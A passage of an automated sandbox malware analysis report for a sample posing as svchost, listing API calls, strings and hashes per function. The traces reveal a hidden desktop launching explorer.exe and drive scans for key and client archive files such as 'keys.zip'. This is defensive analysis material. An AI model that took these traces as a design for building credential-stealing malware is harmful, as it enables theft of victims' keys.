                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C8360B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 789118668-0
                                                                                                                                                                                                                    • Opcode ID: 72fb88ff3de7e1185104bfe03946fb904dfb069a929e23a0ef0fda400d6561b3
                                                                                                                                                                                                                    • Instruction ID: bf5478c376627f2509143d8bfa76f969eb437a9b52595ec0a6831fcc23554143
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72fb88ff3de7e1185104bfe03946fb904dfb069a929e23a0ef0fda400d6561b3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23012431F892801ADF116B3D686073AABDA9FC2968B0C92DAE446C7280D722C9008340
                                                                                                                                                                                                                    Function 02C72930 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: callocexitfree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3367576030-0
                                                                                                                                                                                                                    • Opcode ID: 0f0cf4d178bcc210f5dc5721167d9b50273371881535febb34f9f0f099658dd9
                                                                                                                                                                                                                    • Instruction ID: 000e5a7d30da90e0a151403ee1b5ecb3026ebeb8182f7ae249b2a5586dc08dfa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f0cf4d178bcc210f5dc5721167d9b50273371881535febb34f9f0f099658dd9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6018476600159ABD7118F4ADC80F9B7BA9EF88750F040518FE0587301C771D911CBE6
                                                                                                                                                                                                                    Function 02C88F70 Relevance: 4.5, APIs: 3, Instructions: 24threadmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C88F7E
                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1494777729-0
                                                                                                                                                                                                                    • Opcode ID: 75b85df2a244b49084cb9c6be1fee03f6b29c8988f75ef377feece3f958ed39b
                                                                                                                                                                                                                    • Instruction ID: 3d072e8d0ad7959a8a5fc85f18e2cf0cd3f70cfa6d2a8bf5e3b67d3b8feb11de
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75b85df2a244b49084cb9c6be1fee03f6b29c8988f75ef377feece3f958ed39b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AE0E5B6E40259EBCF01DFD8E845E9DB778FB48321F008659F915A7240C735A914CB60
                                                                                                                                                                                                                    Function 0040207A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040208C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID: V,@
                                                                                                                                                                                                                    • API String ID: 3664257935-3634209070
                                                                                                                                                                                                                    • Opcode ID: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                                    • Instruction ID: d15e959a12f23ccec2fe85088e2afbb8a6d817ea7d7d5b015e5417604cfff27a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12D05E76E027298BCB20CF94A5052AEF730FB44731F0043AADE257338083351C118AD4

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 02C7C380 Relevance: 103.7, APIs: 55, Strings: 4, Instructions: 429windowsynchronizationmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 02C7C3DF
                                                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02C7C3EA
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C3FD
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 02C7C412
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C421
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,-00000008), ref: 02C7C42D
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C43C
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C447
                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C45A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 02C7C498
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 02C7C4A8
                                                                                                                                                                                                                    • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C4B7
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02C7C4CF
                                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 02C7C4D9
                                                                                                                                                                                                                    • CreateFontIndirectA.GDI32 ref: 02C7C4EF
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02C7C4FF
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7C537
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7C53A
                                                                                                                                                                                                                    • GetWindowInfo.USER32(00000000,?), ref: 02C7C54E
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 02C7C5B3
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02C7C5DD
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 02C7C5E9
                                                                                                                                                                                                                    • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02C7C605
                                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02C7C62A
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02C7C63C
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 02C7C645
                                                                                                                                                                                                                    • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C654
                                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 02C7C65B
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02C7C66F
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02C7C693
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02C7C6A0
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 02C7C6B0
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000DE), ref: 02C7C6CC
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000F2), ref: 02C7C6D5
                                                                                                                                                                                                                    • LoadIconA.USER32(00000000,00007F00), ref: 02C7C6E1
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02C7C6FB
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C724
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C733
                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C746
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000003), ref: 02C7C769
                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 02C7C787
                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 02C7C794
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C7A3
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7C7BB
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: GetCurrentThreadId.KERNEL32 ref: 02C7C344
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D
                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02C7C7C8
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 02C7C837
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000), ref: 02C7C83E
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C84E
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7C868
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 02C7C87D
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C88C
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 02C7C898
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7C8A7
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 02C7C8AE
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 02C7C8C3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                                    • String ID: '$<$P0#v$static
                                                                                                                                                                                                                    • API String ID: 2592195760-1574280343
                                                                                                                                                                                                                    • Opcode ID: ef69f0a1398285c23b71343fc943ffede84846a0e686b3e3f8ebdbed849b94b7
                                                                                                                                                                                                                    • Instruction ID: fd7e9198ded1431252ecc94c8436da75a98c5ce6b82cbdab1c8a503a73804f3d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef69f0a1398285c23b71343fc943ffede84846a0e686b3e3f8ebdbed849b94b7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE19E71A84341AFD3128F64EC88F6A7BA8FB88725F104F19F51AD72C0CB749A51CB61
                                                                                                                                                                                                                    Function 02C786C0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 260threadsleepprocessCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateDesktopA.USER32 ref: 02C78711
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(00000000), ref: 02C7872A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C78738
                                                                                                                                                                                                                    • CreateProcessA.KERNEL32 ref: 02C7877C
                                                                                                                                                                                                                    • GetShellWindow.USER32 ref: 02C78788
                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 02C787A2
                                                                                                                                                                                                                    • GetShellWindow.USER32 ref: 02C787A4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C787D3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C787E1
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C787FB
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C78809
                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 02C7880F
                                                                                                                                                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C78820
                                                                                                                                                                                                                    • RegisterWindowMessageA.USER32(80f507eba), ref: 02C78848
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C7885D
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?), ref: 02C788A7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C788B8
                                                                                                                                                                                                                    • CreateProcessA.KERNEL32 ref: 02C78905
                                                                                                                                                                                                                    • GetShellWindow.USER32 ref: 02C78911
                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 02C78924
                                                                                                                                                                                                                    • GetShellWindow.USER32 ref: 02C78926
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,?), ref: 02C78955
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02C78963
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7897D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C7898B
                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 02C78991
                                                                                                                                                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C789A2
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C789CF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Handle$CreateDesktop$CloseInformationShellThread$FindProcessSleepmemset$MessageRegister
                                                                                                                                                                                                                    • String ID: 80f507eba$D$D$Shell_TrayWnd$c:\windows$c:\windows\explorer.exe
                                                                                                                                                                                                                    • API String ID: 340731545-4192075031
                                                                                                                                                                                                                    • Opcode ID: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
                                                                                                                                                                                                                    • Instruction ID: 44ee53593746ed547ee0629c9a9b28ec431908d50eb276aea1e373b7e83b79d8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 029148B1988350AFD312DF65D848B5BBBE8EF88754F108F5AF64983240DB748515CFA2
                                                                                                                                                                                                                    Function 02C911C0 Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 376COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C911DE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C911F8
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91222
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C91247
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C91287
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C91291
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C91299
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C912AA
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C912B1
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 02C912F4
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02C91340
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3,00000000,00000000), ref: 02C91387
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BF8F3$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0#v$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                                    • API String ID: 1576442920-1793234277
                                                                                                                                                                                                                    • Opcode ID: 43b3cffd80596728024a8af44e17c0d32701adb87a282b355a06483f4d1a53d5
                                                                                                                                                                                                                    • Instruction ID: 6cf4f9e84f40e98a3ba9a695ee025706ec90e138cbbabd429458fd5191a74a5b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43b3cffd80596728024a8af44e17c0d32701adb87a282b355a06483f4d1a53d5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6D129309442968FDF168F24D85DBE67BE9EF85304F1886D4E88DD7241DBB1DA48CB90
                                                                                                                                                                                                                    Function 02C8BB20 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 345fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8BB47
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8BB69
                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8BB88
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 02C8BBA1
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8BCE4
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8BD28
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8BD30
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8BD46
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 02C8BF52
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
                                                                                                                                                                                                                    • String ID: *.00*$.txt$.zip$7F1BFC0D$asus$found.$keys$path
                                                                                                                                                                                                                    • API String ID: 3801700313-2328322984
                                                                                                                                                                                                                    • Opcode ID: 53750372f6315024cead11d43f8b3c4a02f473998cff8e8f2616de3ddc165091
                                                                                                                                                                                                                    • Instruction ID: eb0aa9984d832d5777501823ad65b4b7dba08da0154381e56215e5f837fe31a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53750372f6315024cead11d43f8b3c4a02f473998cff8e8f2616de3ddc165091
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFC1F4315087818FC716DF3894687ABBBE5AFC9348F188A5DE9C9C7250EB31DA09C791
                                                                                                                                                                                                                    Function 02C8D0C0 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 345fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8D0E7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8D109
                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8D128
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 02C8D141
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 02C8D195
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFCBF), ref: 02C8D284
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
                                                                                                                                                                                                                    • String ID: *.00*$.txt$.zip$7F1BFCBF$asus$found.$keys$path
                                                                                                                                                                                                                    • API String ID: 3801700313-420153276
                                                                                                                                                                                                                    • Opcode ID: 9509ff08100616bb61cc63c2f59bcaab3454ce0d711c2b29e489054a5d20bbe2
                                                                                                                                                                                                                    • Instruction ID: aa9f37e62b3eb9a5c461c1e9d8a0575e99d5f0c0cb5e9c87025faf26779bf6c5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9509ff08100616bb61cc63c2f59bcaab3454ce0d711c2b29e489054a5d20bbe2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AC1D8715087818FC716DF349858BABBBE5AFC5349F148A5DE8CAD7280EB30D609C792
                                                                                                                                                                                                                    Function 02C7BE40 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 342windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7BE9A
                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 02C7BEA5
                                                                                                                                                                                                                    • GetWindowInfo.USER32(?,?), ref: 02C7BF02
                                                                                                                                                                                                                    • GetAncestor.USER32(?,00000003,?,762330D0), ref: 02C7BF27
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000003), ref: 02C7BFA0
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7BFC8
                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 02C7BFD3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7C002
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 02C7C026
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7C029
